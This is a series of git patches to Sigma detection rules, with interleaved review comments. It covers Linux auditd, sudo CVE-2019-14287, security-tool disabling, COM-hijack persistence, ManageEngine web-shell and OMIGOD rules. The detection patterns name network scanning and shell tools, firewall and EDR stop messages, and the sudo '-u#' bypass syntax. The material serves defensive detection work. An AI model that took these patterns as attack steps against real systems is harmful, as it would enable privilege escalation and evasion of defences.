@@ -30,19 +26,6 @@ detection: netcat_listen_flag: CommandLine|contains: 'l' condition: (netcat and not netcat_listen_flag) or network_scanning_tools ---- -id: 3761e026-f259-44e6-8826-719ed8079408 -logsource: - product: linux - service: auditd - definition: 'Configure these rules https://github.com/Neo23x0/auditd/blob/master/audit.rules#L182-L183' -detection: - selection: - type: 'SYSCALL' - exe|endswith: - - '/telnet' - - '/nmap' - - '/netcat' - - '/nc' - key: 'network_connect_4' - condition: selection +falsepositives: + - Legitimate administration activities +level: low \ No newline at end of file From ecefc6e913d31d3825c78527a1330f6e130a5539 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 14 Sep 2021 19:29:49 +0200 Subject: [PATCH 0946/1367] add missing product --- rules/linux/auditd/lnx_auditd_password_policy_discovery.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml b/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml index eccbff04..ec9ede5a 100644 --- a/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml +++ b/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml @@ -4,9 +4,11 @@ status: stable description: Detects password policy discovery commands author: Ömer Günal, oscd.community date: 2020/10/08 +modified: 2021/09/14 references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md logsource: + product: linux service: auditd detection: selection: From 87e5fc48fa437f3b98a8a55602e48b38566a46be Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 14 Sep 2021 19:32:58 +0200 Subject: [PATCH 0947/1367] split global lnx_security_tools_disabling.yml --- rules/linux/lnx_security_tools_disabling.yml | 24 ++++----------- .../lnx_security_tools_disabling_syslog.yml | 30 +++++++++++++++++++ 2 files changed, 35 insertions(+), 19 deletions(-) create mode 100644 rules/linux/lnx_security_tools_disabling_syslog.yml 
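Review bot: `netcat_listen_flag: CommandLine|contains: 'l'` (context at the top of this hunk) matches any command line containing the letter l, so `netcat and not netcat_listen_flag` is almost never true and the process_creation rule in practice reduces to `network_scanning_tools`; this is inherited rather than introduced by the split, but it is the right moment to tighten the selection to the actual flag, at minimum `CommandLine|contains: ' -l'`. The `detection` block this belongs to starts outside the hunk.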
diff --git a/rules/linux/lnx_security_tools_disabling.yml b/rules/linux/lnx_security_tools_disabling.yml index a51eade7..b8e5b816 100644 --- a/rules/linux/lnx_security_tools_disabling.yml +++ b/rules/linux/lnx_security_tools_disabling.yml @@ -1,20 +1,16 @@ -action: global title: Disabling Security Tools +id: e3a8a052-111f-4606-9aee-f28ebeb76776 status: experimental description: Detects disabling security tools author: Ömer Günal, Alejandro Ortuno, oscd.community date: 2020/06/17 +modified: 2021/09/14 references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md -falsepositives: - - Legitimate administration activities -level: medium tags: - attack.defense_evasion - attack.t1562.004 - attack.t1089 # an old one ---- -id: e3a8a052-111f-4606-9aee-f28ebeb76776 logsource: category: process_creation product: linux @@ -83,16 +79,6 @@ detection: - 'disable' - 'falcon-sensor' condition: 1 of them ---- -id: 49f5dfc1-f92e-4d34-96fa-feba3f6acf36 -logsource: - product: linux - service: syslog -detection: - keywords: - - '*stopping iptables*' - - '*stopping ip6tables*' - - '*stopping firewalld*' - - '*stopping cbdaemon*' - - '*stopping falcon-sensor*' - condition: keywords +falsepositives: + - Legitimate administration activities +level: medium \ No newline at end of file diff --git a/rules/linux/lnx_security_tools_disabling_syslog.yml b/rules/linux/lnx_security_tools_disabling_syslog.yml new file mode 100644 index 00000000..655b9528 --- /dev/null +++ b/rules/linux/lnx_security_tools_disabling_syslog.yml 
@@ -0,0 +1,30 @@ +title: Disabling Security Tools +id: 49f5dfc1-f92e-4d34-96fa-feba3f6acf36 +related: + - id: e3a8a052-111f-4606-9aee-f28ebeb76776 + type: derived +status: experimental +description: Detects disabling security tools +author: Ömer Günal, Alejandro Ortuno, oscd.community +date: 2020/06/17 +modified: 2021/09/14 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md +tags: + - attack.defense_evasion + - attack.t1562.004 + - attack.t1089 # an old one +logsource: + product: linux + service: syslog +detection: + keywords: + - '*stopping iptables*' + - '*stopping ip6tables*' + - '*stopping firewalld*' + - '*stopping cbdaemon*' + - '*stopping falcon-sensor*' + condition: keywords +falsepositives: + - Legitimate administration activities +level: medium \ No newline at end of file From 38c0f83eaf3bc800685d9836fd8e5b51e69994cd Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 14 Sep 2021 20:07:13 +0200 Subject: [PATCH 0948/1367] split global lnx_sudo_cve_2019_14287.yml --- rules/linux/lnx_sudo_cve_2019_14287.yml | 20 ++++--------- rules/linux/lnx_sudo_cve_2019_14287_user.yml | 30 ++++++++++++++++++++ 2 files changed, 35 insertions(+), 15 deletions(-) create mode 100644 rules/linux/lnx_sudo_cve_2019_14287_user.yml diff --git a/rules/linux/lnx_sudo_cve_2019_14287.yml b/rules/linux/lnx_sudo_cve_2019_14287.yml index 426f5934..22c1cfb6 100644 --- a/rules/linux/lnx_sudo_cve_2019_14287.yml +++ b/rules/linux/lnx_sudo_cve_2019_14287.yml 
@@ -1,35 +1,25 @@ -action: global title: Sudo Privilege Escalation CVE-2019-14287 +id: f74107df-b6c6-4e80-bf00-4170b658162b status: experimental description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287 author: Florian Roth date: 2019/10/15 -modified: 2019/10/20 +modified: 2021/09/14 references: - https://www.openwall.com/lists/oss-security/2019/10/14/1 - https://access.redhat.com/security/cve/cve-2019-14287 - https://twitter.com/matthieugarin/status/1183970598210412546 logsource: product: linux -falsepositives: - - Unlikely -level: critical tags: - attack.privilege_escalation - attack.t1068 - attack.t1169 # an old one - attack.t1548.003 ---- -id: f74107df-b6c6-4e80-bf00-4170b658162b detection: selection_keywords: - '* -u#*' condition: selection_keywords ---- -id: 7fcc54cb-f27d-4684-84b7-436af096f858 -detection: - selection_user: - USER: - - '#-*' - - '#*4294967295' - condition: selection_user +falsepositives: + - Unlikely +level: critical \ No newline at end of file diff --git a/rules/linux/lnx_sudo_cve_2019_14287_user.yml b/rules/linux/lnx_sudo_cve_2019_14287_user.yml new file mode 100644 index 00000000..ab92d197 --- /dev/null +++ b/rules/linux/lnx_sudo_cve_2019_14287_user.yml 
@@ -0,0 +1,30 @@ +title: Sudo Privilege Escalation CVE-2019-14287 +id: 7fcc54cb-f27d-4684-84b7-436af096f858 +related: + - id: f74107df-b6c6-4e80-bf00-4170b658162b + type: derived +status: experimental +description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287 +author: Florian Roth +date: 2019/10/15 +modified: 2021/09/14 +references: + - https://www.openwall.com/lists/oss-security/2019/10/14/1 + - https://access.redhat.com/security/cve/cve-2019-14287 + - https://twitter.com/matthieugarin/status/1183970598210412546 +logsource: + product: linux +tags: + - attack.privilege_escalation + - attack.t1068 + - attack.t1169 # an old one + - attack.t1548.003 +detection: + selection_user: + USER: + - '#-*' + - '#*4294967295' + condition: selection_user +falsepositives: + - Unlikely +level: critical \ No newline at end of file From 83531bb2ff181737ca0394e0f0e9bea10657fbd6 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 14 Sep 2021 20:13:57 +0200 Subject: [PATCH 0949/1367] split global lnx_system_info_discovery.yml --- .../lnx_auditd_system_info_discovery2.yml | 35 +++++++++++++++++++ rules/linux/lnx_system_info_discovery.yml | 29 +++------------ 2 files changed, 39 insertions(+), 25 deletions(-) create mode 100644 rules/linux/auditd/lnx_auditd_system_info_discovery2.yml diff --git a/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml b/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml new file mode 100644 index 00000000..60f5afa4 --- /dev/null +++ b/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml 
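Review bot: The new `_user.yml` rule keeps `logsource: product: linux` with no `service` or `category`, so the `USER: '#-*'` selection is applied to every Linux log source a backend knows rather than the sudo/auth log that carries a `USER=` field; the parent keyword rule has the same gap, so this is inherited, but splitting is the moment to add `service: auth` (or whichever source the author expects) to both files. `tags:` also sits between `logsource:` and `detection:` here while the other files split in this series place it before `logsource:`; reorder for consistency.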
@@ -0,0 +1,35 @@ +title: System Information Discovery +id: 1f358e2e-cb63-43c3-b575-dfb072a6814f +related: + - id: 42df45e7-e6e9-43b5-8f26-bec5b39cc239 + type: derived +status: stable +description: Detects system information discovery commands +author: Ömer Günal, oscd.community +date: 2020/10/08 +modified: 2020/05/30 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md +tags: + - attack.discovery + - attack.t1082 +logsource: + product: linux + service: auditd +detection: + selection: + type: 'PATH' + name: + - '/sys/class/dmi/id/bios_version' + - '/sys/class/dmi/id/product_name' + - '/sys/class/dmi/id/chassis_vendor' + - '/proc/scsi/scsi' + - '/proc/ide/hd0/model' + - '/proc/version' + - '/etc/*version' + - '/etc/*release' + - '/etc/issue' + condition: selection +falsepositives: + - Legitimate administration activities +level: informational \ No newline at end of file diff --git a/rules/linux/lnx_system_info_discovery.yml b/rules/linux/lnx_system_info_discovery.yml index f8b68956..21f1c28b 100644 --- a/rules/linux/lnx_system_info_discovery.yml +++ b/rules/linux/lnx_system_info_discovery.yml @@ -1,5 +1,5 @@ -action: global title: System Information Discovery +id: 42df45e7-e6e9-43b5-8f26-bec5b39cc239 status: stable description: Detects system information discovery commands author: Ömer Günal, oscd.community @@ -7,14 +7,9 @@ date: 2020/10/08 modified: 2020/05/30 references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md -falsepositives: - - Legitimate administration activities -level: informational tags: - attack.discovery - attack.t1082 ---- -id: 42df45e7-e6e9-43b5-8f26-bec5b39cc239 logsource: product: linux category: process_creation 
@@ -29,22 +24,6 @@ detection: - '/lscpu' - '/lsmod' condition: selection ---- -id: 1f358e2e-cb63-43c3-b575-dfb072a6814f -logsource: - product: linux - service: auditd -detection: - selection: - type: 'PATH' - name: - - '/sys/class/dmi/id/bios_version' - - '/sys/class/dmi/id/product_name' - - '/sys/class/dmi/id/chassis_vendor' - - '/proc/scsi/scsi' - - '/proc/ide/hd0/model' - - '/proc/version' - - '/etc/*version' - - '/etc/*release' - - '/etc/issue' - condition: selection +falsepositives: + - Legitimate administration activities +level: informational \ No newline at end of file From a3477893def1777bd7df95f721ff2275d22eb22a Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 14 Sep 2021 21:02:13 +0200 Subject: [PATCH 0950/1367] Update lnx_auditd_network_service_scanning.yml --- rules/linux/auditd/lnx_auditd_network_service_scanning.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/linux/auditd/lnx_auditd_network_service_scanning.yml b/rules/linux/auditd/lnx_auditd_network_service_scanning.yml index 59aab8c6..ff1e827e 100644 --- a/rules/linux/auditd/lnx_auditd_network_service_scanning.yml +++ b/rules/linux/auditd/lnx_auditd_network_service_scanning.yml @@ -7,6 +7,7 @@ status: experimental description: Detects enumeration of local or remote network services. author: Alejandro Ortuno, oscd.community date: 2020/10/21 +modified: 2021/09/14 references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md tags: @@ -28,4 +29,4 @@ detection: condition: selection falsepositives: - Legitimate administration activities -level: low \ No newline at end of file +level: low From a6da209507245992215bcaf535ead823febd75ad Mon Sep 17 00:00:00 2001 
From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 14 Sep 2021 21:02:51 +0200 Subject: [PATCH 0951/1367] Update lnx_auditd_system_info_discovery2.yml --- rules/linux/auditd/lnx_auditd_system_info_discovery2.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml b/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml index 60f5afa4..dc0f65b6 100644 --- a/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml +++ b/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml @@ -7,7 +7,7 @@ status: stable description: Detects system information discovery commands author: Ömer Günal, oscd.community date: 2020/10/08 -modified: 2020/05/30 +modified: 2021/09/14 references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md tags: @@ -32,4 +32,4 @@ detection: condition: selection falsepositives: - Legitimate administration activities -level: informational \ No newline at end of file +level: informational From 33a51df46a458fe021657aaf83ef9b22d2737a57 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 14 Sep 2021 21:03:46 +0200 Subject: [PATCH 0952/1367] Update lnx_system_info_discovery.yml --- rules/linux/lnx_system_info_discovery.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/linux/lnx_system_info_discovery.yml b/rules/linux/lnx_system_info_discovery.yml index 21f1c28b..8bec4ce2 100644 --- a/rules/linux/lnx_system_info_discovery.yml +++ b/rules/linux/lnx_system_info_discovery.yml @@ -4,7 +4,7 @@ status: stable description: Detects system information discovery commands author: Ömer Günal, oscd.community date: 2020/10/08 -modified: 2020/05/30 +modified: 2021/09/14 references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md tags: 
@@ -26,4 +26,4 @@ detection: condition: selection falsepositives: - Legitimate administration activities -level: informational \ No newline at end of file +level: informational From 314fa5aaa5a01356f3fe7948fe0289b27a2e77d4 Mon Sep 17 00:00:00 2001 From: Maxime Lamothe-Brassard Date: Tue, 14 Sep 2021 18:00:09 -0700 Subject: [PATCH 0953/1367] Add validation for logical sub operators. --- tools/sigma/backends/limacharlie.py | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/tools/sigma/backends/limacharlie.py b/tools/sigma/backends/limacharlie.py index 383134a4..0d5e23a2 100644 --- a/tools/sigma/backends/limacharlie.py +++ b/tools/sigma/backends/limacharlie.py @@ -50,6 +50,17 @@ def _mapProcessCreationOperations(node): return node +def _validateSubrules(elem): + # Make sure that all elements in the rules + # are actual operators. Otherwise this + # indicates the Sigma engine provided us + # with partial contextual information we + # cannot map to LimaCharlie data with + # any certainty. + for sub in elem.get( 'rules', [] ): + if not isinstance( sub, dict ): + raise NotImplementedError("Sub-rule does not contain an operator.") + # We support many different log sources so we keep different mapping depending # on the log source and category. # The mapping key is product/category/service. @@ -403,6 +414,7 @@ class LimaCharlieBackend(BaseBackend): result, ] } + _validateSubrules(result) if self._postOpMapper is not None: result = self._postOpMapper(result) return yaml.safe_dump(result) @@ -424,6 +436,7 @@ class LimaCharlieBackend(BaseBackend): "op": "and", "rules": filtered, } + _validateSubrules(result) if self._postOpMapper is not None: result = self._postOpMapper(result) return result @@ -445,6 +458,7 @@ class LimaCharlieBackend(BaseBackend): "op": "or", "rules": filtered, } + _validateSubrules(result) if self._postOpMapper is not None: result = self._postOpMapper(result) return result From 3b8282c221593259a19815c76e52440bc46e064a Mon Sep 17 00:00:00 2001 
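Review bot: The `NotImplementedError` raised in `_validateSubrules` does not say which sub-rule tripped it, which makes a failure on a large rule set hard to trace; `raise NotImplementedError("Sub-rule does not contain an operator: %r" % (sub,))` keeps the offending value in the message. The helper also assumes `elem` is a dict (`elem.get`), which holds for the three call sites at +414, +436 and +458 since each passes the dict it has just built, but the comment block above the loop describes the function's contract and would read better as a docstring. Validation runs before `self._postOpMapper` in all three places, so a mapper that rewrites `rules` is not covered; a one-line comment saying that is intended would avoid the question later. The enclosing methods of the three later hunks start and end outside the hunk.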
From: frack113 Date: Wed, 15 Sep 2021 16:21:30 +0200 Subject: [PATCH 0954/1367] fix detection --- ...calation_via_service_registry_permissions.yml} | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) rename rules/windows/{registry_event/sysmon_possible_privilege_escalation_via_service_registry_permissions_weakness.yml => process_creation/process_creation_possible_privilege_escalation_via_service_registry_permissions.yml} (81%) diff --git a/rules/windows/registry_event/sysmon_possible_privilege_escalation_via_service_registry_permissions_weakness.yml b/rules/windows/process_creation/process_creation_possible_privilege_escalation_via_service_registry_permissions.yml similarity index 81% rename from rules/windows/registry_event/sysmon_possible_privilege_escalation_via_service_registry_permissions_weakness.yml rename to rules/windows/process_creation/process_creation_possible_privilege_escalation_via_service_registry_permissions.yml index 48f0533b..683811e1 100755 --- a/rules/windows/registry_event/sysmon_possible_privilege_escalation_via_service_registry_permissions_weakness.yml +++ b/rules/windows/process_creation/process_creation_possible_privilege_escalation_via_service_registry_permissions.yml @@ -14,16 +14,17 @@ date: 2019/10/26 modified: 2020/09/06 logsource: product: windows - category: registry_event + category: process_creation detection: selection: - IntegrityLevel: 'Medium' - TargetObject|contains: '\services\' - TargetObject|endswith: - - '\ImagePath' - - '\FailureCommand' - - '\Parameters\ServiceDll' + CommandLine|contains|all: + - ControlSet + - services + CommandLine|contains: + - \ImagePath + - \FailureCommand + - \ServiceDll condition: selection falsepositives: - Unknown From 8a847e0538b69d844d21dcf94ff014acd4bb97ed Mon Sep 17 00:00:00 2001 
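Review bot: The rewritten `selection` matches any process command line containing `ControlSet`, `services` and one of the three value names, which includes read-only operations such as `reg query`, and the original `IntegrityLevel: 'Medium'` restriction is dropped, so the rule no longer distinguishes a low-privilege write attempt from an administrator or tooling query. If the intent is still the permissions-weakness write, consider restricting to write operations (for example a `CommandLine|contains` on `add` / `Set-ItemProperty`) and replacing the `Unknown` in falsepositives with the admin and inventory tooling that will now fire. The title and description are outside the hunk and presumably still describe a registry event, so they should be checked against the new `process_creation` source.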
From: frack113 <62423083+frack113@users.noreply.github.com> Date: Wed, 15 Sep 2021 19:05:31 +0200 Subject: [PATCH 0955/1367] Update process_creation_possible_privilege_escalation_via_service_registry_permissions.yml --- ...le_privilege_escalation_via_service_registry_permissions.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/process_creation_possible_privilege_escalation_via_service_registry_permissions.yml b/rules/windows/process_creation/process_creation_possible_privilege_escalation_via_service_registry_permissions.yml index 683811e1..8c0411ff 100755 --- a/rules/windows/process_creation/process_creation_possible_privilege_escalation_via_service_registry_permissions.yml +++ b/rules/windows/process_creation/process_creation_possible_privilege_escalation_via_service_registry_permissions.yml @@ -11,7 +11,7 @@ tags: status: experimental author: Teymur Kheirkhabarov date: 2019/10/26 -modified: 2020/09/06 +modified: 2021/09/15 logsource: product: windows category: process_creation From 6e981f56dfd470e49f9d9bf75fe9991fe7605f10 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 16 Sep 2021 09:20:41 +0200 Subject: [PATCH 0956/1367] fix detection from references --- .../sysmon_registry_persistence_search_order.yml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/rules/windows/registry_event/sysmon_registry_persistence_search_order.yml b/rules/windows/registry_event/sysmon_registry_persistence_search_order.yml index 0b5fd732..d0063b19 100755 --- a/rules/windows/registry_event/sysmon_registry_persistence_search_order.yml +++ b/rules/windows/registry_event/sysmon_registry_persistence_search_order.yml 
@@ -6,7 +6,7 @@ references: - https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/ author: Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien date: 2020/04/14 -modified: 2021/08/14 +modified: 2021/09/16 tags: - attack.persistence - attack.t1038 # an old one @@ -16,10 +16,10 @@ logsource: product: windows detection: selection: # Detect new COM servers in the user hive - TargetObject|contains|all: - - 'HKU\' - - '_Classes\CLSID\' - - '\InProcServer32\(Default)' + TargetObject|startswith: + - 'HKCR\CLSID\' + - 'HKCU\Software\Classes\CLSID\' + TargetObject|endswith: \InprocServer32\default filter1: Details|contains: # Exclude privileged directories and observed FPs - '%%systemroot%%\system32\' From a926439b394c401050e89a3f014e355d508f87a5 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 16 Sep 2021 11:39:45 +0200 Subject: [PATCH 0957/1367] fix: `default` to `(Default)` --- .../registry_event/sysmon_registry_persistence_search_order.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/registry_event/sysmon_registry_persistence_search_order.yml b/rules/windows/registry_event/sysmon_registry_persistence_search_order.yml index d0063b19..d97b58ca 100755 --- a/rules/windows/registry_event/sysmon_registry_persistence_search_order.yml +++ b/rules/windows/registry_event/sysmon_registry_persistence_search_order.yml @@ -19,7 +19,7 @@ detection: TargetObject|startswith: - 'HKCR\CLSID\' - 'HKCU\Software\Classes\CLSID\' - TargetObject|endswith: \InprocServer32\default + TargetObject|endswith: '\InprocServer32\(Default)' filter1: Details|contains: # Exclude privileged directories and observed FPs - '%%systemroot%%\system32\' From c36cf428aca52c6cbd1325298fa05c901a2e554b Mon Sep 17 00:00:00 2001 
From: frack113 Date: Thu, 16 Sep 2021 16:18:30 +0200 Subject: [PATCH 0958/1367] clean list 1 elem --- .../registry_event/win_outlook_registry_todaypage.yml | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/rules/windows/registry_event/win_outlook_registry_todaypage.yml b/rules/windows/registry_event/win_outlook_registry_todaypage.yml index 7b44bfde..05465bf0 100644 --- a/rules/windows/registry_event/win_outlook_registry_todaypage.yml +++ b/rules/windows/registry_event/win_outlook_registry_todaypage.yml @@ -18,12 +18,10 @@ detection: - 'Software\Microsoft\Office\' - '\Outlook\Today\' selectionStamp: - TargetObject|endswith: - - 'Stamp' + TargetObject|endswith: 'Stamp' Details: DWORD (0x00000001) selectionUserDefined: - TargetObject|endswith: - - 'UserDefinedUrl' + TargetObject|endswith: 'UserDefinedUrl' condition: selection1 and (selectionStamp or selectionUserDefined) fields: - Details From 7a22fc6dbaebe77ca1a31d62f60382985781d728 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 16 Sep 2021 16:26:53 +0200 Subject: [PATCH 0959/1367] clean string --- .../registry_event/win_outlook_registry_todaypage.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/windows/registry_event/win_outlook_registry_todaypage.yml b/rules/windows/registry_event/win_outlook_registry_todaypage.yml index 05465bf0..336b5dc8 100644 --- a/rules/windows/registry_event/win_outlook_registry_todaypage.yml +++ b/rules/windows/registry_event/win_outlook_registry_todaypage.yml @@ -18,10 +18,10 @@ detection: - 'Software\Microsoft\Office\' - '\Outlook\Today\' selectionStamp: - TargetObject|endswith: 'Stamp' - Details: DWORD (0x00000001) + TargetObject|endswith: Stamp + Details: DWORD (0x00000001) selectionUserDefined: - TargetObject|endswith: 'UserDefinedUrl' + TargetObject|endswith: UserDefinedUrl condition: selection1 and (selectionStamp or selectionUserDefined) fields: - Details From 13553ef917099ebadeca6564e26335b1b8a2f326 Mon Sep 17 00:00:00 2001 
From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Fri, 17 Sep 2021 09:53:12 +0700 Subject: [PATCH 0960/1367] Update web_cve_2021_40539_manageengine_adselfservice_exploit.yml --- ...web_cve_2021_40539_manageengine_adselfservice_exploit.yml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml b/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml index f678cfef..875403e8 100644 --- a/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml +++ b/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml @@ -5,11 +5,15 @@ description: Detects an authentication bypass vulnerability affecting the REST A references: - https://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/ - https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html + - https://us-cert.cisa.gov/ncas/alerts/aa21-259a author: Sittikorn S, Nuttakorn Tungpoonsup date: 2021/09/10 +modified: 2021/09/17 tags: - attack.initial_access - attack.t1190 + - attack.persistence + - attack.t1505.003 logsource: product: zoho_manageengine category: webserver @@ -17,6 +21,7 @@ logsource: detection: selection: c-uri|contains: + - '/help/admin-guide/Reports/ReportGenerate.jsp' - '/RestAPI/LogonCustomization' - '/RestAPI/Connection' condition: selection From ebc5ebe7baaa1e6d8ed9f6f7fe6cceef5cd42f34 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 17 Sep 2021 08:23:14 +0200 Subject: [PATCH 0961/1367] cleanup condition --- rules/windows/registry_event/win_outlook_registry_webview.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/registry_event/win_outlook_registry_webview.yml b/rules/windows/registry_event/win_outlook_registry_webview.yml index 62c4804f..136c765f 100644 --- a/rules/windows/registry_event/win_outlook_registry_webview.yml 
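Review bot: The added URI `/help/admin-guide/Reports/ReportGenerate.jsp` appears to be the web-shell location described in the newly referenced CISA alert, i.e. post-exploitation access rather than the bypass itself, but the rule's description (outside the hunk) still only speaks of the authentication bypass; extending it along the lines of `description: Detects exploitation of the authentication bypass (CVE-2021-40539) in ManageEngine ADSelfService Plus and requests to the web shell path dropped by it` keeps the text aligned with the new persistence / T1505.003 tags. If the product serves legitimate content under `/help/admin-guide/`, the falsepositives section (also outside the hunk) should name it.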
+++ b/rules/windows/registry_event/win_outlook_registry_webview.yml @@ -7,6 +7,7 @@ references: - https://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us author: Tobias Michalski date: 2021/06/09 +modified: 2021/09/17 tags: - attack.persistence - attack.t1112 @@ -23,7 +24,7 @@ detection: TargetObject|contains: - 'Calendar' - 'Inbox' - condition: selection1 and 1 of selection2 + condition: selection1 and selection2 fields: - Details falsepositives: From 6e4edfdf2087b1259f36cb1d24da41c4a2b789b6 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 17 Sep 2021 09:11:53 +0200 Subject: [PATCH 0962/1367] fix detection --- .../registry_event/sysmon_susp_mic_cam_access.yml | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/rules/windows/registry_event/sysmon_susp_mic_cam_access.yml b/rules/windows/registry_event/sysmon_susp_mic_cam_access.yml index f8ffaeb6..77400edb 100644 --- a/rules/windows/registry_event/sysmon_susp_mic_cam_access.yml +++ b/rules/windows/registry_event/sysmon_susp_mic_cam_access.yml @@ -3,6 +3,7 @@ id: 62120148-6b7a-42be-8b91-271c04e281a3 description: Detects Processes accessing the camera and microphone from suspicious folder author: Den Iuzvyk date: 2020/06/07 +modified: 2021/09/17 references: - https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072 tags: @@ -23,12 +24,12 @@ detection: - webcam selection_3: TargetObject|contains: - - '#C:#Windows#Temp#' - - '#C:#$Recycle.bin#' - - '#C:#Temp#' - - '#C:#Users#Public#' - - '#C:#Users#Default#' - - '#C:#Users#Desktop#' + - ':#Windows#Temp#' + - ':#$Recycle.bin#' + - ':#Temp#' + - ':#Users#Public#' + - ':#Users#Default#' + - ':#Users#Desktop#' condition: all of selection_* falsepositives: - Unlikely, there could be conferencing software running from a Temp folder accessing the devices 
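Review bot: The last entry of `selection_3`, `':#Users#Desktop#'`, only matches a directory literally named `Users\Desktop`, which is not the per-user layout `Users\<name>\Desktop`; if a user's Desktop is meant, `'#Desktop#'` (or a wildcard between `Users#` and `#Desktop#`) is what the entry should contain — this predates the commit, but the rewrite of every entry is the moment to fix it. Dropping the `#C` prefix makes the remaining entries match on any drive letter, which is presumably the intent; a short comment on `selection_3` saying so would explain why each value now starts with `:#`.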
From 7618cf4672c106a4e78550cb460a38bfb3d91e1b Mon Sep 17 00:00:00 2001 From: Roberto Rodriguez Date: Fri, 17 Sep 2021 04:23:11 -0400 Subject: [PATCH 0963/1367] Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell --- ..._scx_runasprovider_executeshellcommand.yml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml diff --git a/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml b/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml new file mode 100644 index 00000000..d9f579cf --- /dev/null +++ b/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml @@ -0,0 +1,32 @@ +title: OMIGOD SCX RunAsProvider ExecuteShellCommand +id: 045b5f9c-49f7-4419-a236-9854fb3c827a +description: Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite. +status: experimental +date: 2021/09/17 +modified: 2019/09/17 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +tags: + - attack.privilege_escalation + - attack.initial_access + - attack.execution + - attack.t1068 + - attack.t1190 + - attack.t1203 +references: + - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure + - https://github.com/Azure/Azure-Sentinel/pull/3059 +logsource: + product: linux + service: auditd +detection: + selection: + type: 'SYSCALL' + SYSCALL: 'execve' + uid: '0' + cwd: '/var/opt/microsoft/scx/tmp' + comm: 'sh' + condition: selection +falsepositives: + - Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand. +level: Medium + 
